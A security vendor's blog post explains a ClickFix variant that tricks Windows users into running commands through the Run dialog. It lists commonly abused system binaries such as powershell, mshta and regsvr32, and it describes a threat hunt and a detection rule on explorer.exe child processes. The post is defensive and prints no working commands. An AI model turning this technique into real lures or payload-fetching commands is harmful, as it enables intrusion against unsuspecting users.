When the Run Dialog Becomes an Attack Vector

Recent research from Atos described a new variant of the ClickFix social engineering technique, where attackers trick users into executing malicious commands through the Windows Run dialog (Win + R).

Instead of delivering traditional malware, attackers rely on user interaction with built-in Windows tools. Victims are instructed to copy and run commands that appear to resolve an issue - such as fixing a browser problem or completing a verification step. In reality, these commands execute scripts or download attacker-controlled payloads.

Because the activity is initiated by the user and relies on legitimate system binaries, it can blend in with normal system behavior and evade traditional security controls.

The Technique: Living-off-the-Land Execution

The Windows Run dialog allows users to execute commands directly through Windows Explorer. While designed for convenience, it can also serve as a simple execution mechanism for attackers.

In the campaigns described by researchers, victims were instructed to run commands invoking common Living-off-the-Land binaries (LOLBins) such as:

• powershell.exe

• cmd.exe

• rundll32.exe

• mshta.exe

• regsvr32.exe

These tools are legitimate Windows components frequently used for administrative tasks. However, when executed with malicious parameters, they can download additional payloads, run scripts, or establish persistence without introducing obvious malware files.

Since these commands are typically launched by explorer.exe, the activity may appear similar to normal user behavior at first glance.

Investigating Suspicious Run Dialog Activity

Following the research, CyberSift conducted a targeted threat hunt across Windows process creation logs to identify suspicious executions initiated by explorer.exe.

We focus on:

• Parent-child process relationships where explorer.exe spawns commonly abused command interpreters

• Execution of these binaries in unusual contexts or outside standard administrative workflows
  

Most hits represent legitimate user or administrative activity, but this approach provides early visibility into potentially risky command execution.

Translating Threat Intel into Detection

At CyberSift, we translate threat intelligence into practical detection controls. For this scenario, we created a detection rule [Link] monitoring Event ID 4688, which flags executions of less common command interpreters and system binaries when spawned by explorer.exe outside expected workflows. This ensures that rare, potentially malicious activity is detected without generating noise from normal administrative actions.

Key Takeaway

By monitoring behavioral patterns involving trusted system utilities and translating threat intelligence into actionable detection rules, CyberSift helps organizations detect Run dialog abuse and Living-off-the-Land execution before it escalates into a broader compromise. -Written by Andy Urlep, Security Analyst, CyberSift